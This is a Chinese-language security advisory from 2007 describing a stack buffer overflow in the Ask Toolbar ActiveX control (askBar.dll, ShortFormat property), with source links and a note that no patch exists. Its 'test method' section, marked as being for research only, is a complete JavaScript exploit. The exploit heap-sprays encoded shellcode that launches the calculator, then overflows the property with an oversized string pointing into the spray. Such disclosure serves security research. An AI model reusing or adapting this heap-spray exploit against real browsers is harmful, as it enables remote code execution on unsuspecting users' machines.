发布日期：2007-09-24
更新日期：2007-09-26

受影响系统：

Ask.com Ask Toolbar 4.0.2.53

描述：

---

BUGTRAQ  ID: 25785

Ask Toolbar是安装在Internet Explorer和Firefox浏览器上的搜索工具栏。

Ask Toolbar的ActiveX控件实现上存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制用户系统。

AskJeevesToolBar.SettingsPlugin.1 ActiveX控件（askBar.dll）在处理ShortFormat属性时存在栈溢出漏洞。如果用户受骗访问了恶意网页并向该属性传送了超过500字节的超长字符串的话，就可能触发这个溢出，导致执行任意指令。

<*来源：Joey Mengele （joey.mengele@hushmail.com）
  
  链接：http://marc.info/?l=bugtraq&m=119065352514646&w=2
        http://secunia.com/advisories/26960/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>

<SCRIPT language="javascript">

// This is new technique I invent call 'heap fill attack'

var str0ke = 0x0d0d0d0d;

var sucks = unescape( // Launch the system calculator 100 times because what else?

                      // This code currently not work on Solaris/Sparc

        "%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +

        "%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +

        "%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +

        "%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +

        "%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +

        "%uFF57%u63E7%u6C61%u0063");

var dick = 0x400000;

var j0hnson = sucks.length * 2;

var spraySlideSize = dick - (j0hnson+0x38);

var spraySlide = unescape("%u9090%u9090");

spraySlide = getSpraySlide(spraySlide,spraySlideSize);

heapBlocks = (str0ke - 0x400000)/dick;

memory = new Array();for (i=0;i<heapBlocks;i++)

{memory[i] = spraySlide + sucks;}

try{

gadi = new ActiveXObject( 'AskJeevesToolBar.SettingsPlugin.1' );

}

catch(evron)

{

alert(evron);

}

netdev = "A";

while (netdev.length != 0x5e0)

netdev += "A";

netdev += unescape("%0d%0d%0d%0d");

gadi.ShortFormat = netdev;

function getSpraySlide(spraySlide, spraySlideSize)

        {while (spraySlide.length*2<spraySlideSize){

        spraySlide += spraySlide;}

        spraySlide = spraySlide.substring(0,spraySlideSize/2);

        return spraySlide;}

</script>

</html>

建议：

---

厂商补丁：

Ask.com
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://dl.ask.com/toolbar/moz/download.html

浏览次数：2786
严重程度：0（网友投票）